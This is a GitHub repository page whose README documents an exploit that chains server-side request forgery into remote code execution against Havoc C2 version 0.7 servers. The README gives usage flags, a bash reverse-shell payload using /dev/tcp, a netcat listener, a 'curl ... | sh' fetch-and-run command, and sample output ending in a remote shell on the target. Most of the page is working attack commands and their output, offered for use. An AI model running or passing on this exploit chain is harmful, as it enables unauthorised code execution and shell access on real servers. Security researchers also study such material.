Skip to content

0xsyr0/Havoc-C2-SSRF-RCE-Exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Havoc-C2-SSRF-RCE-Exploit

Merged Proof of Concepts (PoC) for Server-Side Request Forgery (SSRF) and Remote Code Execution (RCE) to execute arbitrary code through WebSockets on Havoc C2 version 0.7 in a more comfortable way.

This version of two PoCs relys heavily on the work of @chebuya & @IncludeSecurity! Without them, no exploit would exist here. Mad respect for their skills and hard work!

Preparation

$ python3 -m virtualenv venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Usage

$ python3 exploit.py -h
usage: exploit.py [-h] -t TARGET [-p PORT] -i INTERNAL_IP --internal-port INTERNAL_PORT --payload-url PAYLOAD_URL --username USERNAME --password PASSWORD

options:
  -h, --help            show this help message and exit
  -t, --target TARGET   Target URL with scheme (e.g., https://10.10.10.10)
  -p, --port PORT       Optional port (inferred from scheme or URL)
  -i, --internal-ip INTERNAL_IP
                        Internal IP behind the web server
  --internal-port INTERNAL_PORT
                        Internal Havoc C2 port
  --payload-url PAYLOAD_URL
                        Payload URL to fetch and execute
  --username USERNAME   WebSocket login username
  --password PASSWORD   WebSocket login password

Payload

$ cat payload
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'

Local Listener

$ nc -lnvp <LPORT>

Web Server providing the payload

$ python3 -m http.server 80

Command Example

$ python3 exploit.py -t https://<RHOST> -i 127.0.0.1 --internal-port 40056 --payload-url 'curl http://<LHOST>/payload | sh' --username <USERNAME> --password '<PASSWORD>'

Execution Example

$ python3 exploit.py -t https://192.168.1.1 -i 127.0.0.1 --internal-port 40056 --payload-url 'curl http://192.168.1.2/payload | sh' --username testuser --password 'testpassword'

[*] Registering agent...
[+] Agent registered.
[*] Opening socket on teamserver...
[+] Socket opened.
[*] Writing to socket...
[+] Socket write successful.
[*] Reading from socket...
[*] Writing to socket...
[+] Socket write successful.
[*] Reading from socket...
[!] No response from WebSocket.
[*] Writing to socket...
[+] Socket write successful.
[*] Reading from socket...
[!] No response from WebSocket.
[*] Writing to socket...
[+] Socket write successful.
[*] Reading from socket...
[!] No response from WebSocket.
$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [192.168.1.2] from (UNKNOWN) [192.168.1.1] 60048
bash: cannot set terminal process group (3251): Inappropriate ioctl for device
bash: no job control in this shell
testuser@havoc:~/Havoc/payloads/Demon$

Credits

About

Merged exploit to abuse SSRF for delivering RCE through websockets.

Topics

proof-of-concept websockets poc rce ssrf havoc server-side-request-forgery remote-code-execution havoc2 havoc-framework

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Languages